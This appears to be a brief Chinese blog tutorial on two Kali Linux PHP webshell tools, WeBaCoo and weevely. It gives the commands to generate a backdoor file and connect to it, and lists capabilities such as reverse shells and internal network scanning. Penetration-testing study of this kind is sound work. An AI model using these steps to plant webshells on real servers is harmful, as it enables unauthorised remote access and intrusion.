这里简单介绍kali下的两款工具,时间比较仓促,简单的说下,后面再继续更新一些详细内容

一款小巧的php后门工具:WeBaCoo

全名:Web Backdoor Cookie

简介:kali已经集成,产生终端性shell,编码类型通过http头传输,隐蔽性比较强

优缺点:方便简单,适合作为临时shell,没有密码,只能用于php

使用方法:

生成服务端程序

webacoo -g -o a.php

客户端连接:

webacoo -t -u http://127.0.0.1/a.php

连接的权限为当前服务器的权限,权限比较小,能做的事情很有限.

第二款:weevely

具有隐蔽性的类终端PHP webshell[拥有linux上的菜刀之称]

30多个强大的管理模块

可用于执行系统命令,浏览文件系统

检查服务器常见配置错误

创建正向,反向TCP Shell链接

通过目标主机代理HTTP流量

从目标主机运行端口扫描,进行内网渗透

可以设置密码,看了网上的很多文章提到了kali自带的weevely缺少pysockets库,而不能正常运行,需要安装其模块,可以用豆瓣源然后去安装

https://pypi.doubanio.com/simple

点击豆瓣源链接下载pysockets压缩包到本地,解压缩后执行下一条命令

./setup.py install

生成服务端程序:

weevely generate <password> 1.php

客户端连接:

weevely http://127.0.0.1/1.php <password>

连接成功后,可以做的事情就多了,时间仓促,改日更

kali下生成木马的工具相关推荐

  1. 使用Kali linux生成木马入侵局域网安卓手机

    1.首先查看本机ip,这里我本机IP地址为192.168.0.105 2.生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip ...

  2. kali下生成web端后门

    很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了. ...

  3. kali下有哪些代理工具?又有什么用呢?

    前言 最近几天了解了kali中一些代理工具的基本使用,做一个小小的总结,kali操作系统的官网为www.kali.org,感兴趣的可以去官网下载镜像,如何安装这里就不在讲解了,百度有很多教程.新手这里 ...

  4. msfvenom生成木马攻击-Windows10实现自己黑自己

    简介: 昨天看赛题的时候,发现了一个生成"木马",学一下,来做个笔记. 没有想到msf竟然有一个,可以生成木马的工具,msfvenom. 本文用 # 作为注释. 测试环境: 攻击机 ...

  5. 使用msfvenom生成木马用于监听别人的操作

    ss msfvenom Options: -p, --payload < payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的payload,请使用& ...

  6. kali怎么安装python3_kali下python安装pwntools工具 | kTWO-个人博客

    摘要 本文讲述的是再kali下面的python2.7中安装pwntools工具,这个工具是打ctf必备工具也是解pwn必备工具,本文将一步步介绍如何安装成功. 0x01 pwntools介绍 pwnt ...

  7. 2021-12-09 使用kali生成木马,渗透Windows系统

    本文章仅供学习和参考! 欢迎交流~ 目录 一.实验题目:使用kali生成木马,渗透Windows系统 二.实验内容: 使用kali中的Metasploit生成木马,控制Windows系统 三.实验环境 ...

  8. linux rsa密钥生成工具,linux下生成rsa密钥的方法

    首先生成密钥,用命令ssh-keygen –t rsa 运行后可以一直空格,生成密钥,id_rsa和id_rsa.pub文件 ,默认放在/root/.ssh/下,.ssh文件是隐藏的,要显示隐藏文件才 ...

  9. MSF生成木马及木马的简单使用

    0x00 前言 本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正. 由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVE ...

  10. 利用msfvenom生成木马文件反弹shell

    目录 1.安装靶机和攻击机 2.利用生成木马文件 3.msf里面开启监听 4.攻击成功且利用 5.meterpreter简单系统命令 1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSD ...

最新文章

  1. 何谓程序员?何谓中国的程序员?
  2. C++_CFontDialog字体选择对话框
  3. 如何在Microsoft Excel中将文本转换为日期值
  4. wget for windows
  5. Qt学习笔记之——生成exe可执行文件并打包生成安装软件
  6. Essential C++中文版——满汉全席之外
  7. FISCO BCOS流量控制实现
  8. fcpx瘦身插件_FCPX有哪些特别好用的插件?
  9. 再谈内核模块加载(二)—模块加载流程(上)
  10. 3.1_21 JavaSE入门 P20 【正则】Pattern模式类、Matcher匹配器、元字符、分组捕获、反向引用
  11. linux找不到fastboot驱动下载,fastboot 刷机傻瓜教程
  12. python离线安装环境 解决 ERROR: Could not find a version that satisfies the requirement xxx 以及winError[10061]
  13. 分站活动丨“香港科大商学院-黑瞳科技”2020【人工智能】百万奖金国际创业大赛--上海站+成都站宣讲会...
  14. 体系结构复习2——指令级并行(分支预測和VLIW)
  15. GitHub / 码云 Pages 打造个人在线简历
  16. 乐动手环app下载安装_乐动健康下载app_新版本手机乐动健康手环软件下载安装 安卓版 V2.08 - 罐头安卓网...
  17. svn导出历史版本、指定版本
  18. android贪食蛇详细教程实现加源码
  19. 阿里云服务器ECS装好宝塔 但访问不了面板的解决方法
  20. 磁盘柜支持linux,linux 连接磁盘柜

热门文章

  1. Cesium|xt3d 兼容西部世界模型压平效果
  2. [附源码]java毕业设计政府公用车辆管理系统
  3. 【DM】Combating Web Spam with TrustRank - 用TrustRank对抗网络垃圾邮件
  4. python将数据导入数据库 atomic_Python3 连接 Sqlite3
  5. 同一台计算机同时安装多个打印机,r230驱动-同一台电脑可不可以装两台同品牌同型号的打印 – 手机爱问...
  6. python循环中释放内存的方法_我怎样才能在Python中明确释放内存?
  7. 2015年阿里巴巴校招面试经验汇总
  8. 智慧环卫全流程设计方案
  9. 【Day5.6】当地人的美食街
  10. 智能家居(3)智能交互的竞品分析